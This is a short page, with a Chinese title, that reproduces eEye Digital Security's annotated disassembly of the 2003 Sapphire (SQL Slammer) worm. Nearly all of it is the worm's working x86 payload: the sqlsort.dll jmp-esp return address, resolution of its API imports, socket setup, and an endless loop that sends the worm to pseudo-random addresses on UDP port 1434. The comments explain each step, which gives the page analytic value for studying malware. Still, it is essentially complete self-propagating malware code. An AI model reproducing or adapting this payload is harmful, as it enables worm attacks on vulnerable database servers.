蠕虫反汇编代码
　　
　　
　　
　　;SAPPHIRE WORM CODE DISASSEMBLED
　　;eEye Digital Security: January 25, 2003
　　
　　
　　push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
　　mov eax, 1010101h ; Reconstruct session, after the overflow the payload buffer
　　; get‘s corrupted during program execution but before the
　　; payload is executed. .
　　xor ecx, ecx
　　mov cl, 18h
　　
　　FIXUP:
　　push eax
　　loop FIXUP
　　xor eax, 5010101h
　　push eax
　　mov ebp, esp
　　push ecx
　　push 6C6C642Eh
　　push 32336C65h
　　push 6E72656Bh ; kernel32
　　push ecx
　　push 746E756Fh ; GetTickCount
　　push 436B6369h
　　push 54746547h
　　mov cx, 6C6Ch
　　push ecx
　　push 642E3233h ; ws2_32.dll
　　push 5F327377h
　　mov cx, 7465h
　　push ecx
　　push 6B636F73h ; socket
　　mov cx, 6F74h
　　push ecx
　　push 646E6573h ; sendto
　　mov esi, 42AE1018h ; IAT from sqlsort
　　lea eax, [ebp-2Ch] ; (ws2_32.dll)
　　push eax
　　call dword ptr [esi] ; call loadlibrary
　　push eax
　　lea eax, [ebp-20h]
　　push eax
　　lea eax, [ebp-10h] ; (kernel32.dll)
　　push eax
　　call dword ptr [esi] ; loadlibrary
　　push eax
　　mov esi, 42AE1010h ; IAT from sqlsort
　　mov ebx, [esi]
　　mov eax, [ebx]
　　cmp eax, 51EC8B55h ; check entry point fingerprint
　　jz short VALID_GP ; Check entry point fingerprint for getprocaddress, if it failes
　　; fall back to GetProcAddress entry in another DLL version.
　　; Undetermined what dll versions this will succedd on. Due
　　; to the lack of reliable importing this may not work across all
　　; dll versions.
　　mov esi, 42AE101Ch ; IAT entry -> 77EA094C
　　
　　VALID_GP:
　　call dword ptr [esi] ; GetProcAddress
　　call eax ; return from GetProcaddress = GetTickCount entrypoint
　　xor ecx, ecx
　　push ecx
　　push ecx
　　push eax
　　xor ecx, 9B040103h
　　xor ecx, 1010101h
　　push ecx ; 9A050002 = port 1434 / AF_INET
　　lea eax, [ebp-34h] ; (socket)
　　push eax
　　mov eax, [ebp-40h] ; ws2_32 base address
　　push eax
　　call dword ptr [esi] ; GetProcAddress
　　push 11h
　　push 2
　　push 2
　　call eax ; socket
　　push eax
　　lea eax, [ebp-3Ch] ; sendto
　　push eax
　　mov eax, [ebp-40h] ; ws2_32 base address
　　push eax
　　call dword ptr [esi] ; GetProcAddress
　　mov esi, eax ; save sendto -> esi
　　or ebx, ebx
　　xor ebx, 0FFD9613Ch
　　
　　PRND:
　　mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
　　lea ecx, [eax+eax*2]
　　lea edx, [eax+ecx*4]
　　shl edx, 4
　　add edx, eax
　　shl edx, 8
　　sub edx, eax
　　lea eax, [eax+edx*4]
　　add eax, ebx ; Pseudo Random Algorithm End
　　mov [ebp-4Ch], eax
　　push 10h
　　lea eax, [ebp-50h]
　　push eax
　　xor ecx, ecx
　　push ecx
　　xor cx, 178h
　　push ecx
　　lea eax, [ebp+3]
　　push eax
　　mov eax, [ebp-54h]
　　push eax
　　call esi ; sendto
　　jmp short PRND ; Jump back to Pseudo Random Algorithm Start